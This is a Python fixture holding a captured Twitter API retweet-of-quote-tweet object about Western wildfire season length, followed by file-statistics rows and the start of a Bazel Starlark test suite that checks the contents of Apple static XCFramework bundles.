        "translator_type": "none",
        "profile_text_color": "333333",
        "profile_image_url_https": "https://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "profile_sidebar_fill_color": "DDEEF6",
        "entities": {
            "description": {
                "urls": []
            }
        },
        "followers_count": 0,
        "profile_sidebar_border_color": "C0DEED",
        "id_str": "2875189485",
        "profile_background_color": "C0DEED",
        "listed_count": 3,
        "is_translation_enabled": False,
        "utc_offset": None,
        "statuses_count": 21,
        "description": "",
        "friends_count": 0,
        "location": "",
        "profile_link_color": "1DA1F2",
        "profile_image_url": "http://abs.twimg.com/sticky/default_profile_images/default_profile_0_normal.png",
        "following": False,
        "geo_enabled": True,
        "profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
        "screen_name": "jlittman_dev",
        "lang": "en",
        "profile_background_tile": False,
        "favourites_count": 0,
        "name": "Justin Littman dev",
        "notifications": False,
        "url": None,
        "created_at": "Thu Nov 13 15:49:55 +0000 2014",
        "contributors_enabled": False,
        "time_zone": None,
        "protected": False,
        "default_profile": True,
        "is_translator": False
    },
    "geo": None,
    "in_reply_to_user_id_str": "481186914",
    "possibly_sensitive": False,
    "lang": "en",
    "created_at": "Fri Mar 31 13:36:51 +0000 2017",
    "in_reply_to_status_id_str": "839526473534959617",
    "place": None
}
# tweet 8 is a quote tweet nested in a retweet: the outer object is the
# retweet; "retweeted_status" carries the retweeted tweet, which is itself a
# quote tweet whose "quoted_status" carries the quoted tweet (with a video in
# its "extended_entities"). Captured in extended mode ("full_text").
# NOTE(review): several nested numeric ids (e.g. 918436293247406100,
# 878622069532971000, 878622618886094800) disagree with their *_str
# counterparts — presumably float precision loss when the fixture was
# captured; rely on the *_str values. TODO: confirm against the capture.
tweet8: dict = {
    "created_at": "Fri Oct 13 07:11:19 +0000 2017",
    "id": 918735887264972800,
    "id_str": "918735887264972800",
    "full_text": "RT @ClimateCentral: Wildfire season in the American West is now two and a half months longer than it was 40 years ago. Our wildfire report…",
    "truncated": False,
    "display_text_range": [
        0,
        139
    ],
    "entities": {
        "hashtags": [],
        "symbols": [],
        "user_mentions": [
            {
                "screen_name": "ClimateCentral",
                "name": "Climate Central",
                "id": 15463610,
                "id_str": "15463610",
                "indices": [
                    3,
                    18
                ]
            }
        ],
        "urls": []
    },
    "source": "<a href=\"http://twitter.com/download/iphone\" rel=\"nofollow\">Twitter for iPhone</a>",
    "in_reply_to_status_id": None,
    "in_reply_to_status_id_str": None,
    "in_reply_to_user_id": None,
    "in_reply_to_user_id_str": None,
    "in_reply_to_screen_name": None,
    # The account that performed the retweet.
    "user": {
        "id": 1074184813,
        "id_str": "1074184813",
        "name": "DamonSmolderhalder😈",
        "screen_name": "DElenaTimeless",
        "location": "The Universe",
        "description": "#Damon #TVD #Delena #IanSomerhalder #NikkiReed #SOMEREED #Baby 👶🏻 #BeautifulHumans ❤️#ISF 🐶🐱 #KatGraham #Riverdale #Yoga 🙏🏼",
        "url": None,
        "entities": {
            "description": {
                "urls": []
            }
        },
        "protected": False,
        "followers_count": 1899,
        "friends_count": 906,
        "listed_count": 61,
        "created_at": "Wed Jan 09 16:04:14 +0000 2013",
        "favourites_count": 51301,
        "utc_offset": None,
        "time_zone": None,
        "geo_enabled": True,
        "verified": False,
        "statuses_count": 39703,
        "lang": "en",
        "contributors_enabled": False,
        "is_translator": False,
        "is_translation_enabled": False,
        "profile_background_color": "642D8B",
        "profile_background_image_url": "http://abs.twimg.com/images/themes/theme10/bg.gif",
        "profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme10/bg.gif",
        "profile_background_tile": True,
        "profile_image_url": "http://pbs.twimg.com/profile_images/600743044535554048/DBgKQQMF_normal.jpg",
        "profile_image_url_https": "https://pbs.twimg.com/profile_images/600743044535554048/DBgKQQMF_normal.jpg",
        "profile_banner_url": "https://pbs.twimg.com/profile_banners/1074184813/1461658232",
        "profile_link_color": "FF0000",
        "profile_sidebar_border_color": "65B0DA",
        "profile_sidebar_fill_color": "7AC3EE",
        "profile_text_color": "3D1957",
        "profile_use_background_image": True,
        "has_extended_profile": True,
        "default_profile": False,
        "default_profile_image": False,
        "following": False,
        "follow_request_sent": False,
        "notifications": False,
        "translator_type": "none"
    },
    "geo": None,
    "coordinates": None,
    "place": None,
    "contributors": None,
    # The retweeted tweet — itself a quote tweet (is_quote_status True).
    "retweeted_status": {
        "created_at": "Thu Oct 12 11:20:50 +0000 2017",
        "id": 918436293247406100,
        "id_str": "918436293247406080",
        "full_text": "Wildfire season in the American West is now two and a half months longer than it was 40 years ago. Our wildfire report in @YEARSofLIVING ⬇️ https://t.co/nk49r9sS1a",
        "truncated": False,
        "display_text_range": [
            0,
            139
        ],
        "entities": {
            "hashtags": [],
            "symbols": [],
            "user_mentions": [
                {
                    "screen_name": "YEARSofLIVING",
                    "name": "YEARS",
                    "id": 308245641,
                    "id_str": "308245641",
                    "indices": [
                        122,
                        136
                    ]
                }
            ],
            "urls": [
                {
                    "url": "https://t.co/nk49r9sS1a",
                    "expanded_url": "https://twitter.com/yearsofliving/status/878622618886094848",
                    "display_url": "twitter.com/yearsofliving/…",
                    "indices": [
                        140,
                        163
                    ]
                }
            ]
        },
        "source": "<a href=\"http://twitter.com/download/iphone\" rel=\"nofollow\">Twitter for iPhone</a>",
        "in_reply_to_status_id": None,
        "in_reply_to_status_id_str": None,
        "in_reply_to_user_id": None,
        "in_reply_to_user_id_str": None,
        "in_reply_to_screen_name": None,
        # Author of the retweeted (quoting) tweet.
        "user": {
            "id": 15463610,
            "id_str": "15463610",
            "name": "Climate Central",
            "screen_name": "ClimateCentral",
            "location": "Princeton, NJ",
            "description": "Researching and reporting the science and impacts of climate change 🌎",
            "url": "https://t.co/sTxlhOkKr4",
            "entities": {
                "url": {
                    "urls": [
                        {
                            "url": "https://t.co/sTxlhOkKr4",
                            "expanded_url": "http://www.climatecentral.org",
                            "display_url": "climatecentral.org",
                            "indices": [
                                0,
                                23
                            ]
                        }
                    ]
                },
                "description": {
                    "urls": []
                }
            },
            "protected": False,
            "followers_count": 77475,
            "friends_count": 6206,
            "listed_count": 3050,
            "created_at": "Thu Jul 17 03:30:32 +0000 2008",
            "favourites_count": 30341,
            "utc_offset": -14400,
            "time_zone": "Eastern Time (US & Canada)",
            "geo_enabled": True,
            "verified": True,
            "statuses_count": 52858,
            "lang": "en",
            "contributors_enabled": False,
            "is_translator": False,
            "is_translation_enabled": False,
            "profile_background_color": "0A1241",
            "profile_background_image_url": "http://pbs.twimg.com/profile_background_images/677240012/4a1aac3ffc674aa0a080bcb176825eeb.jpeg",
            "profile_background_image_url_https": "https://pbs.twimg.com/profile_background_images/677240012/4a1aac3ffc674aa0a080bcb176825eeb.jpeg",
            "profile_background_tile": True,
            "profile_image_url": "http://pbs.twimg.com/profile_images/697146620543156225/R-VqX0vc_normal.png",
            "profile_image_url_https": "https://pbs.twimg.com/profile_images/697146620543156225/R-VqX0vc_normal.png",
            "profile_banner_url": "https://pbs.twimg.com/profile_banners/15463610/1503413844",
            "profile_link_color": "0079C2",
            "profile_sidebar_border_color": "000000",
            "profile_sidebar_fill_color": "E46F0A",
            "profile_text_color": "410936",
            "profile_use_background_image": True,
            "has_extended_profile": False,
            "default_profile": False,
            "default_profile_image": False,
            "following": False,
            "follow_request_sent": False,
            "notifications": False,
            "translator_type": "none"
        },
        "geo": None,
        "coordinates": None,
        "place": None,
        "contributors": None,
        "is_quote_status": True,
        "quoted_status_id": 878622618886094800,
        "quoted_status_id_str": "878622618886094848",
        # The quoted tweet, embedded inside the retweeted_status.
        "quoted_status": {
            "created_at": "Sat Jun 24 14:35:31 +0000 2017",
            "id": 878622618886094800,
            "id_str": "878622618886094848",
            "full_text": "Wildfire season in the American West is now two and a half months longer than it was 40 years ago.\n\n#YEARSproject #ClimateFacts https://t.co/AiA0mjoNXA",
            "truncated": False,
            "display_text_range": [
                0,
                127
            ],
            # "entities" lists the media with type "photo" (thumbnail view);
            # "extended_entities" below carries the same media as type "video".
            "entities": {
                "hashtags": [
                    {
                        "text": "YEARSproject",
                        "indices": [
                            100,
                            113
                        ]
                    },
                    {
                        "text": "ClimateFacts",
                        "indices": [
                            114,
                            127
                        ]
                    }
                ],
                "symbols": [],
                "user_mentions": [],
                "urls": [],
                "media": [
                    {
                        "id": 878622069532971000,
                        "id_str": "878622069532971008",
                        "indices": [
                            128,
                            151
                        ],
                        "media_url": "http://pbs.twimg.com/ext_tw_video_thumb/878622069532971008/pu/img/tv6rCbBH57EVbrU3.jpg",
                        "media_url_https": "https://pbs.twimg.com/ext_tw_video_thumb/878622069532971008/pu/img/tv6rCbBH57EVbrU3.jpg",
                        "url": "https://t.co/AiA0mjoNXA",
                        "display_url": "pic.twitter.com/AiA0mjoNXA",
                        "expanded_url": "https://twitter.com/YEARSofLIVING/status/878622618886094848/video/1",
                        "type": "photo",
                        "sizes": {
                            "small": {
                                "w": 340,
                                "h": 340,
                                "resize": "fit"
                            },
                            "thumb": {
                                "w": 150,
                                "h": 150,
                                "resize": "crop"
                            },
                            "medium": {
                                "w": 600,
                                "h": 600,
                                "resize": "fit"
                            },
                            "large": {
                                "w": 720,
                                "h": 720,
                                "resize": "fit"
                            }
                        }
                    }
                ]
            },
            "extended_entities": {
                "media": [
                    {
                        "id": 878622069532971000,
                        "id_str": "878622069532971008",
                        "indices": [
                            128,
                            151
                        ],
                        "media_url": "http://pbs.twimg.com/ext_tw_video_thumb/878622069532971008/pu/img/tv6rCbBH57EVbrU3.jpg",
                        "media_url_https": "https://pbs.twimg.com/ext_tw_video_thumb/878622069532971008/pu/img/tv6rCbBH57EVbrU3.jpg",
                        "url": "https://t.co/AiA0mjoNXA",
                        "display_url": "pic.twitter.com/AiA0mjoNXA",
                        "expanded_url": "https://twitter.com/YEARSofLIVING/status/878622618886094848/video/1",
                        "type": "video",
                        "sizes": {
                            "small": {
                                "w": 340,
                                "h": 340,
                                "resize": "fit"
                            },
                            "thumb": {
                                "w": 150,
                                "h": 150,
                                "resize": "crop"
                            },
                            "medium": {
                                "w": 600,
                                "h": 600,
                                "resize": "fit"
                            },
                            "large": {
                                "w": 720,
                                "h": 720,
                                "resize": "fit"
                            }
                        },
                        "video_info": {
                            "aspect_ratio": [
                                1,
                                1
                            ],
                            "duration_millis": 52667,
                            "variants": [
                                {
                                    "content_type": "application/x-mpegURL",
                                    "url": "https://video.twimg.com/ext_tw_video/878622069532971008/pu/pl/SSDau35aVr1jWK77.m3u8"
                                },
                                {
                                    "bitrate": 1280000,
                                    "content_type": "video/mp4",
                                    "url": "https://video.twimg.com/ext_tw_video/878622069532971008/pu/vid/720x720/Ev7hnJeFNOuwA-jt.mp4"
                                },
                                {
                                    "bitrate": 832000,
                                    "content_type": "video/mp4",
                                    "url": "https://video.twimg.com/ext_tw_video/878622069532971008/pu/vid/480x480/vxwV65LvvxvuqoE0.mp4"
                                },
                                {
                                    "bitrate": 320000,
                                    "content_type": "video/mp4",
                                    "url": "https://video.twimg.com/ext_tw_video/878622069532971008/pu/vid/240x240/R17LzSs4N5zqCTPG.mp4"
                                }
                            ]
                        },
                        "additional_media_info": {
                            "monetizable": False
                        }
                    }
                ]
            },
            "source": "<a href=\"http://twitter.com/download/iphone\" rel=\"nofollow\">Twitter for iPhone</a>",
            "in_reply_to_status_id": None,
            "in_reply_to_status_id_str": None,
            "in_reply_to_user_id": None,
            "in_reply_to_user_id_str": None,
            "in_reply_to_screen_name": None,
            # Author of the quoted tweet.
            "user": {
                "id": 308245641,
                "id_str": "308245641",
                "name": "YEARS",
                "screen_name": "YEARSofLIVING",
                "location": "",
                "description": "YEARS of LIVING DANGEROUSLY docu-series on climate change. WATCH on demand on NatGeo, GooglePlay, iTunes, Amazon & DVD #YEARSproject",
                "url": "https://t.co/vKSslafi9r",
                "entities": {
                    "url": {
                        "urls": [
                            {
                                "url": "https://t.co/vKSslafi9r",
                                "expanded_url": "http://yearsoflivingdangerously.com/",
                                "display_url": "yearsoflivingdangerously.com",
                                "indices": [
                                    0,
                                    23
                                ]
                            }
                        ]
                    },
                    "description": {
                        "urls": []
                    }
                },
                "protected": False,
                "followers_count": 25538,
                "friends_count": 1087,
                "listed_count": 659,
                "created_at": "Tue May 31 02:29:26 +0000 2011",
                "favourites_count": 4561,
                "utc_offset": -14400,
                "time_zone": "Eastern Time (US & Canada)",
                "geo_enabled": False,
                "verified": False,
                "statuses_count": 17563,
                "lang": "en",
                "contributors_enabled": False,
                "is_translator": False,
                "is_translation_enabled": False,
                "profile_background_color": "131516",
                "profile_background_image_url": "http://pbs.twimg.com/profile_background_images/439137896788811777/tmrk6A-m.jpeg",
                "profile_background_image_url_https": "https://pbs.twimg.com/profile_background_images/439137896788811777/tmrk6A-m.jpeg",
                "profile_background_tile": True,
                "profile_image_url": "http://pbs.twimg.com/profile_images/787779443792019457/AffHFnwg_normal.jpg",
                "profile_image_url_https": "https://pbs.twimg.com/profile_images/787779443792019457/AffHFnwg_normal.jpg",
                "profile_banner_url": "https://pbs.twimg.com/profile_banners/308245641/1481820006",
                "profile_link_color": "859160",
                "profile_sidebar_border_color": "FFFFFF",
                "profile_sidebar_fill_color": "EFEFEF",
                "profile_text_color": "333333",
                "profile_use_background_image": False,
                "has_extended_profile": False,
                "default_profile": False,
                "default_profile_image": False,
                "following": False,
                "follow_request_sent": False,
                "notifications": False,
                "translator_type": "none"
            },
            "geo": None,
            "coordinates": None,
            "place": None,
            "contributors": None,
            "is_quote_status": False,
            "retweet_count": 80,
            "favorite_count": 47,
            "favorited": False,
            "retweeted": False,
            "possibly_sensitive": False,
            "lang": "en"
        },
        "retweet_count": 190,
        "favorite_count": 118,
        "favorited": False,
        "retweeted": False,
        "possibly_sensitive": False,
        "lang": "en"
    },
    # Quote-status flags are mirrored on the outer retweet as well.
    "is_quote_status": True,
    "quoted_status_id": 878622618886094800,
    "quoted_status_id_str": "878622618886094848",
    "retweet_count": 190,
    "favorite_count": 0,
    "favorited": False,
    "retweeted": False,
    "lang": "en"
}
| 34.361512
| 183
| 0.532303
| 4,955
| 49,996
| 5.120686
| 0.115237
| 0.022071
| 0.021282
| 0.016395
| 0.822252
| 0.801837
| 0.779805
| 0.770386
| 0.757143
| 0.738344
| 0
| 0.101018
| 0.318485
| 49,996
| 1,455
| 184
| 34.361512
| 0.642767
| 0.00558
| 0
| 0.723227
| 0
| 0.011127
| 0.50351
| 0.094148
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f89addb90d78b43c7b37576af583919f835e82e4
| 15,056
|
bzl
|
Python
|
test/starlark_tests/apple_static_xcframework_tests.bzl
|
wendyliga/rules_apple
|
ac43c1e467564d9df6b3355ff93fcaf224f2c0f9
|
[
"Apache-2.0"
] | null | null | null |
test/starlark_tests/apple_static_xcframework_tests.bzl
|
wendyliga/rules_apple
|
ac43c1e467564d9df6b3355ff93fcaf224f2c0f9
|
[
"Apache-2.0"
] | null | null | null |
test/starlark_tests/apple_static_xcframework_tests.bzl
|
wendyliga/rules_apple
|
ac43c1e467564d9df6b3355ff93fcaf224f2c0f9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""xcframework Starlark tests."""
load(
":rules/common_verification_tests.bzl",
"archive_contents_test",
)
def apple_static_xcframework_test_suite(name):
    """Test suite for apple_static_xcframework.

    Args:
        name: the base name to be used in things created by this macro
    """

    # Verify the generated root Info.plist correctly describes every library
    # bundled in the XCFramework: identifiers, framework paths, supported
    # architectures, and platform, plus the XCFramework package markers.
    archive_contents_test(
        name = "{}_ios_root_plist_test".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
        plist_test_file = "$BUNDLE_ROOT/Info.plist",
        plist_test_values = {
            "AvailableLibraries:0:LibraryIdentifier": "ios-arm64",
            "AvailableLibraries:0:LibraryPath": "ios_static_xcframework.framework",
            "AvailableLibraries:0:SupportedArchitectures:0": "arm64",
            "AvailableLibraries:0:SupportedPlatform": "ios",
            "AvailableLibraries:1:LibraryIdentifier": "ios-arm64_x86_64-simulator",
            "AvailableLibraries:1:LibraryPath": "ios_static_xcframework.framework",
            "AvailableLibraries:1:SupportedArchitectures:0": "arm64",
            "AvailableLibraries:1:SupportedArchitectures:1": "x86_64",
            "AvailableLibraries:1:SupportedPlatform": "ios",
            "CFBundlePackageType": "XFWK",
            "XCFrameworkFormatVersion": "1.0",
        },
        tags = [name],
    )

    # Verify that both the device (ios-arm64) and simulator
    # (ios-arm64_x86_64-simulator) slices contain the headers, modulemap,
    # static library, and that the root Info.plist is present.
    archive_contents_test(
        name = "{}_ios_arm64_archive_contents_test".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
        contains = [
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/Headers/shared.h",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/Headers/ios_static_xcframework.h",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/Modules/module.modulemap",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/ios_static_xcframework",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/Headers/shared.h",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/Headers/ios_static_xcframework.h",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/Modules/module.modulemap",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/ios_static_xcframework",
            "$BUNDLE_ROOT/Info.plist",
        ],
        tags = [name],
    )

    # Verify avoid_deps: symbols and headers from avoided dependencies must
    # be excluded from the archive and the embedded static libraries.
    archive_contents_test(
        name = "{}_ios_avoid_deps_test".format(name),
        build_type = "device",
        compilation_mode = "opt",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_avoid_deps",
        contains = [
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_avoid_deps.framework/ios_static_xcfmwk_with_avoid_deps",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_avoid_deps.framework/ios_static_xcfmwk_with_avoid_deps",
            "$BUNDLE_ROOT/Info.plist",
        ],
        not_contains = [
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_avoid_deps.frameworks/Headers/DummyFmwk.h",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_avoid_deps.frameworks/Headers/DummyFmwk.h",
        ],
        binary_test_file = "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_avoid_deps.framework/ios_static_xcfmwk_with_avoid_deps",
        binary_test_architecture = "x86_64",
        binary_contains_symbols = ["_doStuff"],
        binary_not_contains_symbols = ["_frameworkDependent"],
        tags = [name],
    )

    # Verify the generated Objective-C modulemap declares the umbrella header
    # and carries `link` directives for the SDK dylibs/frameworks.
    archive_contents_test(
        name = "{}_objc_generated_modulemap_file_content_test".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_objc_sdk_dylibs_and_and_sdk_frameworks",
        text_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_objc_sdk_dylibs_and_and_sdk_frameworks.framework/Modules/module.modulemap",
        text_test_values = [
            "framework module ios_static_xcfmwk_with_objc_sdk_dylibs_and_and_sdk_frameworks",
            "umbrella header \"ios_static_xcfmwk_with_objc_sdk_dylibs_and_and_sdk_frameworks.h\"",
            "link \"c++\"",
            "link \"sqlite3\"",
        ],
        tags = [name],
    )

    # Verify Swift interfaces (.swiftdoc/.swiftinterface) are bundled per
    # architecture for both device and simulator slices.
    archive_contents_test(
        name = "{}_swift_ios_arm64_x86_64_archive_contents_test".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_swift",
        contains = [
            "$BUNDLE_ROOT/Info.plist",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/arm64.swiftdoc",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/arm64.swiftinterface",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift.framework/ios_static_xcfmwk_with_swift",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/arm64.swiftdoc",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/arm64.swiftinterface",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/x86_64.swiftdoc",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/Modules/ios_static_xcfmwk_with_swift.swiftmodule/x86_64.swiftinterface",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift.framework/ios_static_xcfmwk_with_swift",
        ],
        tags = [name],
    )

    # Test that the Swift generated header is propagated to the Headers directory visible within
    # this iOS static XCFramework along with the Swift interfaces and modulemap files.
    archive_contents_test(
        name = "{}_swift_generates_header_test".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_swift_generated_headers",
        contains = [
            "$BUNDLE_ROOT/Info.plist",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/Headers/ios_static_xcfmwk_with_swift_generated_headers.h",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/module.modulemap",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/arm64.swiftdoc",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/arm64.swiftinterface",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_swift_generated_headers.framework/ios_static_xcfmwk_with_swift_generated_headers",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Headers/ios_static_xcfmwk_with_swift_generated_headers.h",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/module.modulemap",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/arm64.swiftdoc",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/arm64.swiftinterface",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/x86_64.swiftdoc",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/Modules/ios_static_xcfmwk_with_swift_generated_headers.swiftmodule/x86_64.swiftinterface",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_swift_generated_headers.framework/ios_static_xcfmwk_with_swift_generated_headers",
        ],
        tags = [name],
    )

    # Tests below verify device/simulator builds for static libraries using Mach-O load commands.
    # Logic behind which load command gets written, and platform information can be found on LLVM's:
    # - llvm/include/llvm/BinaryFormat/MachO.h
    # - llvm/llvm-project/llvm/lib/MC/MCStreamer.cpp

    # Verify device/simulator static libraries with Mach-O load commands:
    # - LC_VERSION_MIN_IOS: Present if target minimum version is below 12.0 and is not arm64 sim.
    # - LC_BUILD_VERSION: Present if target minimum version is above 12.0 or is arm64 sim.
    archive_contents_test(
        name = "{}_ios_arm64_macho_load_cmd_for_simulator".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
        binary_test_architecture = "arm64",
        binary_test_file = "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/ios_static_xcframework",
        macho_load_commands_not_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
        tags = [name],
    )
    archive_contents_test(
        name = "{}_ios_x86_64_below_12_0_macho_load_cmd_for_simulator".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
        binary_test_architecture = "x86_64",
        binary_test_file = "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework.framework/ios_static_xcframework",
        macho_load_commands_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
        macho_load_commands_not_contain = ["cmd LC_BUILD_VERSION"],
        tags = [name],
    )
    # "platform 7" is the Mach-O platform identifier for the iOS simulator.
    archive_contents_test(
        name = "{}_ios_x86_64_above_12_0_macho_load_cmd_for_simulator".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework_min_os_12",
        binary_test_architecture = "x86_64",
        binary_test_file = "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcframework_min_os_12.framework/ios_static_xcframework_min_os_12",
        macho_load_commands_contain = ["cmd LC_BUILD_VERSION", "platform 7"],
        macho_load_commands_not_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
        tags = [name],
    )

    # Verifies device static libraries build with Mach-O load commands.
    # - LC_VERSION_MIN_IOS: Present if target minimum version is below 12.0.
    # - LC_BUILD_VERSION: Present if target minimum version is above 12.0.
    archive_contents_test(
        name = "{}_ios_x86_64_arm64_below_12_0_macho_load_cmd_for_device".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
        binary_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/ios_static_xcframework",
        macho_load_commands_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
        macho_load_commands_not_contain = ["cmd LC_BUILD_VERSION"],
        tags = [name],
    )
    # "platform 2" is the Mach-O platform identifier for iOS devices.
    archive_contents_test(
        name = "{}_ios_x86_64_arm64_above_12_0_macho_load_cmd_for_device".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework_min_os_12",
        binary_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework_min_os_12.framework/ios_static_xcframework_min_os_12",
        macho_load_commands_contain = ["cmd LC_BUILD_VERSION", "platform 2"],
        macho_load_commands_not_contain = ["cmd LC_VERSION_MIN_IPHONEOS"],
        tags = [name],
    )

    # Verifies that the include scanning feature builds for the given XCFramework rule.
    archive_contents_test(
        name = "{}_ios_arm64_cc_include_scanning_test".format(name),
        build_type = "device",
        target_features = ["cc_include_scanning"],
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework",
        contains = [
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework.framework/ios_static_xcframework",
        ],
        tags = [name],
    )

    # Verifies that bundle_name changes the embedded static libraries and the modulemap file as well
    # as the name of the bundle for the xcframeworks.
    archive_contents_test(
        name = "{}_ios_bundle_name_contents_swift_test".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcfmwk_with_swift_and_bundle_name",
        contains = [
            "$ARCHIVE_ROOT/ios_static_xcfmwk_with_custom_bundle_name.xcframework/",
            "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_custom_bundle_name.framework/ios_static_xcfmwk_with_custom_bundle_name",
            "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_static_xcfmwk_with_custom_bundle_name.framework/ios_static_xcfmwk_with_custom_bundle_name",
        ],
        text_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcfmwk_with_custom_bundle_name.framework/Modules/module.modulemap",
        text_test_values = [
            "framework module ios_static_xcfmwk_with_custom_bundle_name",
            "header \"ios_static_xcfmwk_with_custom_bundle_name.h\"",
            "requires objc",
        ],
        tags = [name],
    )

    # Verify that a user-supplied umbrella header is referenced by the
    # generated modulemap instead of a generated one.
    archive_contents_test(
        name = "{}_custom_umbrella_header_test".format(name),
        build_type = "device",
        target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_static_xcframework_umbrella_header",
        text_test_file = "$BUNDLE_ROOT/ios-arm64/ios_static_xcframework_umbrella_header.framework/Modules/module.modulemap",
        text_test_values = [
